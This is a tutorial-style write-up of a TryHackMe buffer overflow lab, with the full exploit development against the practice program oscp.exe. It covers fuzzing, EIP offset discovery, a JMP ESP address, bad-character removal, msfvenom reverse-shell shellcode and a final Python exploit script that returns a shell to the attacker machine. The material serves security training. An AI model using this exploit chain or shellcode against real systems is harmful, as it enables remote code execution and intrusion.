# Learn Buffer Overflow Techniques

There are a total of 10 labs, from OVERFLOW1 to OVERFLOW10. I'll guide you through the basic concepts so you can solve the other labs on your own.

**About The Labs**

This is an amazing room created by [Tib3rius](https://www.linkedin.com/in/tib3rius/) that includes everything you need if you are preparing for the OSCP and eCPPT certification exams.

I will try to make it as easy as possible. It might be a bit lengthy, but I will cover all the do's and don'ts.

> Note: We will not use the TryHackMe guide, as I find it a little difficult for beginners.

**Lab Requirements**

1. Windows 7 Machine (with Immunity Debugger installed)
    
2. Kali Linux Machine
    

In these labs, we are using a TryHackMe machine that is pre-configured with the above requirements, so let's get started.

The command to connect to the machine and access the full screen is as follows:

```bash
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.70.85 /workarea
```

Once connected, if prompted for network selection, choose Home Network.

**Windows Victim Machine**

As we can see, this machine has a vulnerable application and Immunity Debugger preconfigured. In the vulnerable folder, there is an executable named oscp that we are going to use. Let's find out what this oscp.exe does.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254633797/25847b53-ed51-4131-89ef-b7b8b6d91044.png align="center")

`oscp.exe` is listening on port 1337. From our attacker machine, we can try to connect using `nc`.

Run this command from the attacker's terminal.

```bash
nc 10.10.70.85 1337
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254636099/96c457c2-7ef2-44ad-bb9d-057642f303b1.png align="center")

What happened on the victim machine?

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254637554/bde4d553-827d-4a1f-838f-ae5a5fe6ecaf.png align="center")

The example above shows the general case, which is the ideal functionality.

## **Test Case 1**

From the attacker machine, we will try to send something much larger than test\_akbar.

Where did this idea come from? Since we are working on the buffer overflow room, our goal is to overflow the buffer. This means we will send a large amount of data, which might cause the application to crash.

To send a large amount of data, I plan to use Python to generate A\*1000 and then send it.

First, we sent 1000 A's, but the application was able to respond with OVERFLOW1 COMPLETED.

Now, we are increasing the number of A's from 1000 to 2000 to see what happens.

```bash
&gt;>> print("A"*2000)
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254638945/99ec9361-2c1b-4c27-9990-775a47a40a66.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254640739/15adf083-85df-4e07-8040-636a7c629611.png align="center")

Now, check the application's response.

The application crashed, revealing a buffer overflow vulnerability.

In some cases, you might receive an error called a segmentation fault. This means you are trying to access a part of memory that you are not allowed to access.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254642329/c9be019d-fe62-4407-910a-beb1ab4e5c0a.png align="center")

oscp.exe crashed

## **Test Case 2**

Now, we will write a Python script to automate this process. There are some scripts available in the TryHackMe room for crashing or controlling the EIP, but we won't be using those.

Below is `script2.py`. You can name the script as whatever you like.

```python
#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b"A" * 2000]  # as we are using python3 we need to mention the strings in bytes
    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

Let's run this script without starting oscp.exe to see if it's working correctly. We should get an error.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254643642/6b9fc98e-4d85-4171-9979-c862a17a8eb0.png align="center")

There is one issue in our script, and this is an intentional issue that you might encounter. We are directly sending our payload without using the valid command. In this lab, our command is:

So, we need to specify OVERFLOW1 in our script, followed by a space and our value, as shown below.

> **OVERFLOW1 \[value\]**

Re-editing the script.

The part marked in bold was causing the problem

```python
#!/usr/bin/env python3
import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 2000]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

Now, let's start oscp.exe and run the script.

Make sure oscp.exe is running before you execute the script.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254644991/bda6e2b3-edb0-4300-90c4-cb4f0201baa4.png align="center")

Now check the application.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254646555/46e05877-dc6e-4f75-b083-7e93269d6b12.png align="center")

It crashed, which means our script is working perfectly.

SUPER COOL!

## **Test Case 3**

Here, I am going to use Immunity Debugger because I need to check some registers and other details to get a reverse shell from this machine.

Let's start Immunity Debugger now.

Once open, you have two methods to find the executable: 1) to run the executable and attach it, 2) directly open the .exe file.

It is recommended to open the .exe file directly.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254648720/46470e4a-8225-42f1-a2f0-137dffbd5066.png align="center")

Once open it will be in paused state.

As show below we need to run this and it should be in running state.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254650143/ce388b5a-af27-48ab-ace8-6181e0999b8e.png align="center")

Now we are running.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254651835/f110041a-50bd-46b4-a669-d64a9b71f2b2.png align="center")

So what we are going to do is we will run our `script2.py` and see in my immunity debugger.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254653255/024984ac-1b66-496d-b42a-4571549be113.png align="center")

The application should crash and be the immunity debugger will be moved to Paused again.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254654729/23fd0a59-475c-4db0-bb60-e989774a90ee.png align="center")

Observe the CPU Registers

41414141 is the hexadecimal representation of the characters AAAAAAA.

The most important pointer to note below is EIP, which is overwritten as 414141.

This means that due to overflow, our AAAAA's are crossing EIP and entering ESP, as shown below.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254656097/44cd8e02-f5f6-4172-870c-5a7a36feb2da.png align="center")

So now, what we are interested in is gaining complete control over the EIP. EIP is the instruction pointer that will try to execute the next line of code.

## **Challenge here**

We need to find the exact offset index of this EIP so that we can take full control of it. But our problem is that we sent 2000 A's, so there is no way to figure out exactly where the EIP starts—whether it's at 1500, 1600, 1700, or any value in between. We can't just assume it.

What we know is that we sent 2000 A's, and they are affecting the EIP. To solve this, we will use a cyclic pattern. The cyclic pattern will help us quickly determine the exact point where our A's are affecting the EIP.

We will create a pattern of 2000 characters. This pattern will pass over the EIP values, and by checking the EIP, we can identify the exact pattern where our EIP starts.

```bash
msf-pattern_create -l 2000
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254657398/b52368aa-dd56-4a3b-badc-958ee16f5c4b.png align="center")

Now let's copy this pattern into our payload.

Remove A\*2000 from `script2.py` and paste the pattern above.

```python
#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'pattern']  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

How it actually looks.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254660067/8684d952-993f-4d66-a689-d79e4db8d2c4.png align="center")

Save this, restart the Immunity Debugger, and run `oscp.exe`.

Then, run `script2.py`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254661786/28bcdb15-acc0-4512-b5ce-bda437a15bd3.png align="center")

Again, the application will crash, but now we can identify the EIP value.

EIP 6F43396E is a unique number, and using this number, we can find the index/offset where it is getting overwritten on the EIP.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254663226/b2b2524f-6ac9-4314-926b-9965c9802472.png align="center")

To find the pattern where the EIP is overwritten with the value 6F43396E, we will use another tool called **msf-pattern-offset**.

```bash
msf-pattern_offset -l 2000 -q 6F43396E
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254665249/72a2395b-bc47-4b5c-aac4-eaf3dcdefc44.png align="center")

So now we have found the exact match. This indicates that the EIP starts at 1978. Whatever we write after 1978 will overwrite the EIP.

**Re-edit** `script2.py`

In the script below, the B character will overwrite the EIP.

```python
#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function
    s.send(payload)
    s.close()
except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

Save this, restart the Immunity Debugger, and run `oscp.exe`.

Run `script2.py`.

The application crashed.

Now, my EIP is overwritten to 42424242, which is the hexadecimal conversion of the character B.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254666712/930fc64b-038b-4676-853a-93820d98b9da.png align="center")

Let see If we send something after B where it goes.

**Re-edit** `script2.py`

We have added C char 100 times.

```python
#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 is bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'B' * 4 + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things so we will join this using a join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254668926/c011d481-bad9-40d5-9352-a167a40e13d0.png align="center")

EIP contains 42424242, which represents the character B.

EAX contains our AAAAA.

In **ESP, I have the C character. This is crucial to know because this is where I plan to insert malicious code.**

Now we have control over ESP as well.

What if I make EIP jump or tell EIP to go to ESP? It will go to ESP, and if I replace the C character with my malicious shell code, EIP will execute that code.

That's the main goal we are working towards.

**If you've followed along this far, congratulations!**

## **Malicious Task**

To perform the jumping task, we need to use a Python script called Mona.

Since we are using a TryHackMe machine, it is already installed in the Immunity Debugger.

But let's see where you can get it and where to place it.

[GitHub — corelan/mona: Corelan Repository for mona.py](https://github.com/corelan/mona)

Download the `mona.py` script and move it to the Immunity Debugger's Python folder.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254670445/5acf142d-5b66-4fc3-a507-c6f3eeec0aea.png align="center")

Move `mona.py` here.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254671916/8cd56ee2-294f-481a-8f25-a8e628ec4a35.png align="center")

to invoke mona

```bash
!mona
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254673342/768b2897-7582-4433-8135-7958f943dc93.png align="center")

we are going to use this jump command to jump from EIP to ESP.

```bash
!mona jmp -r esp
```

Here, your Mona terminal will be activated again. Type `!mona` to check the status.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254675719/4131fd29-d2a4-43c4-b796-6b3a9cd44154.png align="center")

We have found a total of 9 pointers. You can choose any one of them, but I will choose the one that has all FALSE. We are using the first one: 0x625011af.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254677053/786be7d3-feaa-42f2-827c-c210cee7f8d6.png align="center")

Now, the problem here is that whenever I use this address, I need to convert it to little-endian format.

Don't worry, we'll learn how.

My address was 0x625011af.

The easiest way is to reverse it and add \\x before each pair of characters, as shown below.

> **\\xaf\\x11\\x50\\x62**

Edit the `script2.py` and paste this little-endian value in place of B.

```python
#!/usr/bin/env python3

import socket
import sys

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'C' * 100]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

The reason we're doing this is that this is the jump address, and I want to jump to this address and enter the C buffer where I'll upload the malicious code.

We will also set a breakpoint. I'm setting this so that whenever the value 0x625011af appears, it stops right there.

Click on the assemble and disassemble box and press CTRL+G.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254678190/2af0a080-f7e2-485c-8dd8-a3fd3ed3c34d.png align="center")

The ESP jmp instruction is set to FFE4

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254679647/79c0170b-2203-4a6a-a6cb-3ee2cc636104.png align="center")

Now our breakpoint is set.

**Run** `script2.py`

Check the Immunity Debugger.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254681135/226f2e98-5267-4e77-8303-80512caadf85.png align="center")

Now the EIP is set to 625011AF, which is the jump instruction. The jump is over ESP, and now we will create malicious code and paste it in 'C'.

There is one major character issue that you will encounter, which I will explain further.

Let's create a malicious payload.

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254682758/9d764352-4701-4082-ace5-909a5eeb7883.png align="center")

We get shellcode that provides a buf variable. All of this is in bytes, but the problem is that the shellcode contains some bad characters that are not allowed in the vulnerable program.

If any bad character is used, we will not get a reverse shell.

### **Find Bad Characters**

Identify the bad characters and remove them from our payload.

Search online to find out what bad characters are.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254685302/f627b2e9-77de-48d8-bc76-6ab641b4a3a9.png align="center")

> [https://github.com/cytopia/badchars](https://github.com/cytopia/badchars)

copy this bad char in our `script2.py` but before running pad b as they are not in bytes.

```python
badchars=(
 “\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10””\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"”\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"”\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"”\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"”\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"”\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"”\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"”\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"”\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"”\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"”\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"”\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"”\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"”\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"”\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)
```

Paste the above characters in script.

```python
#!/usr/bin/env python3

import socket
import sys

badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)  # This will find bad characters

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + badchars]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

Run the `script2.py`

Check immunity debugger.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254686616/b7a7f474-6455-4be5-ac8f-a8b124f809d3.png align="center")

Follow in dump

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254688196/3e201593-2d4f-472a-9298-19b672fac7c7.png align="center")

Now we need to check the hex dump and find the bad characters.

As highlighted below, the actual sequence is 05 06, so it should be 07 08, but it is 0A and 0D.

**Therefore, 07 and 08 are bad characters.**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254689815/fc1db612-46f8-44ca-bcf9-519678c53576.png align="center")

Again found

2C 2D, ideally it should be 2E 2F, but it's 0A, which means

2E and 2F are bad characters.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254691857/d6d0623c-c2f8-4137-8471-2450b6424f8f.png align="center")

We found these many bad characters.

> `\x07\x08\x2e\x2f\xa0\xa1\x00`

Now Again generate the payload excluding this bad characters.

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.48.237 LPORT=2306 -f py -b “\x07\x08\x2e\x2f\xa0\xa1\x00”
```

New Payload which doesn’t have the bad characters.

**Remove the bad characters** and paste this in `script2.py`

```python
buf = b""
buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"
```

Now the script is

```python
#!/usr/bin/env python3

import socket
import sys

# Bad characters
buf = b""

buf += b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x6e\x97\x03\xdf\x83\xee\xfc\xe2\xf4"
buf += b"\x92\x7f\x81\xdf\x6e\x97\x63\x56\x8b\xa6\xc3\xbb"
buf += b"\xe5\xc7\x33\x54\x3c\x9b\x88\x8d\x7a\x1c\x71\xf7"
buf += b"\x61\x20\x49\xf9\x5f\x68\xaf\xe3\x0f\xeb\x01\xf3"
buf += b"\x4e\x56\xcc\xd2\x6f\x50\xe1\x2d\x3c\xc0\x88\x8d"
buf += b"\x7e\x1c\x49\xe3\xe5\xdb\x12\xa7\x8d\xdf\x02\x0e"
buf += b"\x3f\x1c\x5a\xff\x6f\x44\x88\x96\x76\x74\x39\x96"
buf += b"\xe5\xa3\x88\xde\xb8\xa6\xfc\x73\xaf\x58\x0e\xde"
buf += b"\xa9\xaf\xe3\xaa\x98\x94\x7e\x27\x55\xea\x27\xaa"
buf += b"\x8a\xcf\x88\x87\x4a\x96\xd0\xb9\xe5\x9b\x48\x54"
buf += b"\x36\x8b\x02\x0c\xe5\x93\x88\xde\xbe\x1e\x47\xfb"
buf += b"\x4a\xcc\x58\xbe\x37\xcd\x52\x20\x8e\xc8\x5c\x85"
buf += b"\xe5\x85\xe8\x52\x33\xff\x30\xed\x6e\x97\x6b\xa8"
buf += b"\x1d\xa5\x5c\x8b\x06\xdb\x74\xf9\x69\x68\xd6\x67"
buf += b"\xfe\x96\x03\xdf\x47\x53\x57\x8f\x06\xbe\x83\xb4"
buf += b"\x6e\x68\xd6\x8f\x3e\xc7\x53\x9f\x3e\xd7\x53\xb7"
buf += b"\x84\x98\xdc\x3f\x91\x42\x94\xb5\x6b\xff\x09\xd4"
buf += b"\x5e\x7a\x6b\xdd\x6e\x9e\x01\x56\x88\xfd\x13\x89"
buf += b"\x39\xff\x9a\x7a\x1a\xf6\xfc\x0a\xeb\x57\x77\xd3"
buf += b"\x91\xd9\x0b\xaa\x82\xff\xf3\x6a\xcc\xc1\xfc\x0a"
buf += b"\x06\xf4\x6e\xbb\x6e\x1e\xe0\x88\x39\xc0\x32\x29"
buf += b"\x04\x85\x5a\x89\x8c\x6a\x65\x18\x2a\xb3\x3f\xde"
buf += b"\x6f\x1a\x47\xfb\x7e\x51\x03\x9b\x3a\xc7\x55\x89"
buf += b"\x38\xd1\x55\x91\x38\xc1\x50\x89\x06\xee\xcf\xe0"
buf += b"\xe8\x68\xd6\x56\x8e\xd9\x55\x99\x91\xa7\x6b\xd7"
buf += b"\xe9\x8a\x63\x20\xbb\x2c\xf3\x6a\xcc\xc1\x6b\x79"
buf += b"\xfb\x2a\x9e\x20\xbb\xab\x05\xa3\x64\x17\xf8\x3f"
buf += b"\x1b\x92\xb8\x98\x7d\xe5\x6c\xb5\x6e\xc4\xfc\x0a"

try:
    s = socket.socket()  # use to connect the machine
    s.connect(("10.10.70.85", 1337))  # connect is a function
    s.recv(1024)  # 1024 bytes

    # Payload including padding (NOP sled) and the buffer of bad characters
    payload = [b'OVERFLOW1 ' + b'A' * 1978 + b'\xaf\x11\x50\x62' + b'\x90' * 16 + buf]  # as we are using python3 we need to mention the strings in bytes
    payload = b"".join(payload)  # as the above payload consists of 2 things, so we will join this using the join function.

    s.send(payload)
    s.close()

except:
    print("cannot connect to the server Akbar")  # error message if it can't connect
    sys.exit()
```

One last thing we need to add is a NOP sled `\x90`. It is placed between the jump and the payload. We need some space between the jump and the payload to get the reverse shell, so we add `\x90` for padding.

Now, we don't need the immunity debugger. I found my bad character and my jump address, so I will run the program and execute our script.

Running `oscp.exe`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254693397/bcf115b2-c4b8-47c3-96ff-47b0571d4494.png align="center")

Listener in place.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254694747/7fa0d10c-b719-4a69-91f3-cbffbac7092f.png align="center")

Run the `script2.py` for the last time.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254696110/abb51f8e-aba5-4520-b991-755711d6f151.png align="center")

BOOOOMMMMMMM!!!!!!!!!!!!!!!!!!!!!!!!

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254698286/ca4c3ef5-f9e4-40ef-8875-65cc95fc3b7d.png align="center")

And we got the shell.

*Thank you for reading this blog. While attempting this challenge, I learned many things. This was a unique target with a unique vulnerability.*
